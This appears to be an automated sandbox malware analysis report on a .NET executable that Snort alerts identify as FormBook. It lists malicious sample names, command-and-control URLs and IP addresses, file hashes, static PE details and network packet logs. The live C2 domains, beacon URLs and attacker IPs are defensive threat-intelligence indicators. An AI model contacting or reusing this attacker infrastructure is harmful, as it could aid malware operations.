                                                                                          b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?M6AlS=yVFP-hwh&Bv=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnote/Ex+umh37wog==
                                                                                          Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Ozu4_XoX=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&hhD0=gXzt_B
                                                                                          92bd9987_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Ulm=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnRyvfH/oyhh3737Q==&SVg84P=yjR8DXLxiJb
                                                                                          RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?NtTdXn=wXL40t9Hkrxhn&KtxL=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw
                                                                                          5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?NtTdgz=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnote/Ex+umh37wog==&1bj=mj88chf8ThLT
                                                                                          k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?vT=LJBt&5j3=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw
                                                                                          q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?N4=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw&2d=Yn8xRlsx
                                                                                          NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Jv4=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnRyvfH/oyhh3737Q==&NvTHEh=QR-x_26P2h
                                                                                          pCkqlKXv05.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?EzrxGfnx=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnote/Ex+umh37wog==&ojr0k=Sxo0U4
                                                                                          u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?wh=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnRyvfH/oyhh3737Q==&BR=CpFH
                                                                                          Processed APR12.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd
                                                                                          36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?1bVpY=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw&TVg8Ar=tFNd1Vlhj2qp
                                                                                          Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?YPxxw=JxlLiTVHLV_&4h=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==
                                                                                          Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?JtxH=XPs0s4JPf&n8Ehjz3=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw
                                                                                          foHzqhWjvn.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?wR=MHQD&4h0=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1trRh/TEm4y3
                                                                                          27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?RR=YrKhZvg&rp=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          www.yunlimall.comLetter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          7LQAaB3oH4.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          bin.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          feAfWrgHcX.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          www.brunoecatarina.comLetter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          Request For Courtesy Call 7710090112332.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          9XfX7aaf3F.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          wFlt84ubSH.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          KWX1rM9GB0.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          2UPdDxaAmt.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          APPROVED.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          o52k2obPCG.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          pumYguna1i.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          1LHKlbcoW3.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comSecuriteInfo.com.Trojan.Packed2.43183.29557.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          PO#78765439.ZIP.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          PROFORMA FATURA PDF.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          Telex_Payment.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          STATEMENT.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          SKMBT41085NC9.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          CC for account.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          statement.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          CONTRACT SWIFT.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          RE; KOC RFQ for Flangers - RFQ 22965431.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          PO 0003789311.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          tgb4.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          transferencia bancaria.exeGet hashmaliciousBrowse
                                                                                          • 52.15.160.167
                                                                                          SHIPPING DOCUMENT_7048555233PDF.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          item.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          LEASEWEB-USA-SFO-12USlTAPQJikGw.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          FORM C1.xlsxGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          qXDtb88hht.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          wMKDi0Ss3f.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          ENrFQVzLHE.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          Request For Courtesy Call 7710090112332.xlsxGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          bin.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          Compliance A.xlsxGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          Wire Payment Of $35,276.70.exeGet hashmaliciousBrowse
                                                                                          • 23.106.92.86
                                                                                          a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          92bd9987_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          NEW ORDER SOR 10531220.exeGet hashmaliciousBrowse
                                                                                          • 172.255.115.89
                                                                                          BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                                                                          • 172.255.115.119
                                                                                          126-21-11HAR.exeGet hashmaliciousBrowse
                                                                                          • 172.255.208.73
                                                                                          PO#10244.exeGet hashmaliciousBrowse
                                                                                          • 23.82.175.79
                                                                                          EGIHOSTINGUSLetter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          lLJGwAgWDh.exeGet hashmaliciousBrowse
                                                                                          • 104.252.75.149
                                                                                          Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                                          • 104.164.109.43
                                                                                          tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                          • 136.0.84.126
                                                                                          ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                                                          • 104.252.121.237
                                                                                          U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          SOA #093732.exeGet hashmaliciousBrowse
                                                                                          • 172.120.222.45
                                                                                          Invoice.exeGet hashmaliciousBrowse
                                                                                          • 107.165.45.157
                                                                                          CC for account.exeGet hashmaliciousBrowse
                                                                                          • 107.165.149.13
                                                                                          SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                                          • 104.253.112.105
                                                                                          HQvI0y1Wu4.exeGet hashmaliciousBrowse
                                                                                          • 107.165.37.235
                                                                                          KAZOX MATERIALS SDN BHD Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 172.120.222.52
                                                                                          CONTRACT 312000H123 SSR ADVICE 31-05-2021 (1).xlsxGet hashmaliciousBrowse
                                                                                          • 104.252.121.237
                                                                                          003 SOA.exeGet hashmaliciousBrowse
                                                                                          • 104.164.224.68
                                                                                          Items and Specification Needed for RFQ546092227865431209PDF.exeGet hashmaliciousBrowse
                                                                                          • 45.38.86.100
                                                                                          SKMBT_C22421033008180 png.exeGet hashmaliciousBrowse
                                                                                          • 104.252.192.27
                                                                                          Swift copy_9808.exeGet hashmaliciousBrowse
                                                                                          • 107.164.104.228
                                                                                          Order756576747876874653.gz.exeGet hashmaliciousBrowse
                                                                                          • 104.164.6.147
                                                                                          AMAZON-02USlTAPQJikGw.exeGet hashmaliciousBrowse
                                                                                          • 99.83.154.118
                                                                                          SKlGhwkzTi.exeGet hashmaliciousBrowse
                                                                                          • 44.227.65.245
                                                                                          SecuriteInfo.com.Trojan.Packed2.43183.29557.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          Letter 1019.xlsxGet hashmaliciousBrowse
                                                                                          • 18.140.1.169
                                                                                          #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                          • 143.204.98.37
                                                                                          Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                          • 75.2.26.18
                                                                                          U03c2doc.exeGet hashmaliciousBrowse
                                                                                          • 108.128.238.226
                                                                                          Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 18.140.1.169
                                                                                          Docc.htmlGet hashmaliciousBrowse
                                                                                          • 13.224.99.74
                                                                                          ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                                          • 52.209.246.140
                                                                                          Sleek_Free.exeGet hashmaliciousBrowse
                                                                                          • 143.204.209.58
                                                                                          ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                                          • 52.216.141.230
                                                                                          #Ud83d#Udcde_#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                                                                                          • 15.236.176.210
                                                                                          WV Northern Community College.docxGet hashmaliciousBrowse
                                                                                          • 52.43.249.183
                                                                                          wzdu53.exeGet hashmaliciousBrowse
                                                                                          • 13.249.13.113
                                                                                          com.duolingo_1162_apps.evozi.com.apkGet hashmaliciousBrowse
                                                                                          • 52.222.174.5
                                                                                          rnPij0Z886.dllGet hashmaliciousBrowse
                                                                                          • 13.224.91.73
                                                                                          Plex-v8.7.1.20931_build_812981296-armeabi-v7a(Apkgod.net).apkGet hashmaliciousBrowse
                                                                                          • 99.81.164.127
                                                                                          Nota Fiscal Eletronica 00111834.msiGet hashmaliciousBrowse
                                                                                          • 54.171.246.133
                                                                                          #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                                          • 75.2.26.18

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DNPr7t0GMY.exe.log
                                                                                          Process:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1314
                                                                                          Entropy (8bit):5.350128552078965
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                          MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                          SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                          SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                          SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):5.951478829434799
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:DNPr7t0GMY.exe
                                                                                          File size:1325568
                                                                                          MD5:f41951980d050c8fe13c8a2e31e55b94
                                                                                          SHA1:58be890ff4d29b2d17566420c0e455dbfccda9a8
                                                                                          SHA256:12f07790ce9303ed023131642a93d1b62ce4f3d5db8d35ed215d5b2bddc4ff93
                                                                                          SHA512:d24c50ba24c26e0463155092d4d26979e7bcbd264e76fcdeb196f9d906a419366d898719d80aa2e707fefe55ee595b2e5bdaf52c101decf6c556a4545712b1ec
                                                                                          SSDEEP:12288:idV/yAmyLaEy0eBISuTgUeLiW4/ZKVe7T0Q9sRuwpPCwRk:8VbmT9zXZwZi+IQuRuwxCwRk
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q..`..............P.............VL... ...`....@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:00828e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x544c56
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x60BF8C71 [Tue Jun 8 15:27:45 2021 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x144c040x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1460000x61c.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1480000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x144acc0x1c.text
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x142c5c0x142e00False0.510306269357data5.95563041351IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x1460000x61c0x800False0.33251953125data3.45449332784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x1480000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_VERSION0x1460900x38cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                          RT_MANIFEST0x14642c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0000 0x04b0
                                                                                          LegalCopyrightCopyright 2017 - 2021
                                                                                          Assembly Version1.0.0.0
                                                                                          InternalNameAppDomainTimerSafeHandle.exe
                                                                                          FileVersion1.0.0.0
                                                                                          CompanyName
                                                                                          LegalTrademarks
                                                                                          Comments
                                                                                          ProductNameAnimation Studio
                                                                                          ProductVersion1.0.0.0
                                                                                          FileDescriptionAnimation Studio
                                                                                          OriginalFilenameAppDomainTimerSafeHandle.exe

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          06/10/21-19:13:59.731450TCP1201ATTACK-RESPONSES 403 Forbidden804974523.227.38.74192.168.2.3
                                                                                          06/10/21-19:14:16.131239TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3199.195.117.147
                                                                                          06/10/21-19:14:16.131239TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3199.195.117.147
                                                                                          06/10/21-19:14:16.131239TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3199.195.117.147

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jun 10, 2021 19:13:31.940980911 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.136662006 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:32.137096882 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.137279034 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.336549997 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:32.336571932 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:32.336802959 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.336874008 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.532706976 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.491502047 CEST4973780192.168.2.313.59.53.244
                                                                                          Jun 10, 2021 19:13:43.631710052 CEST804973713.59.53.244192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.632787943 CEST4973780192.168.2.313.59.53.244
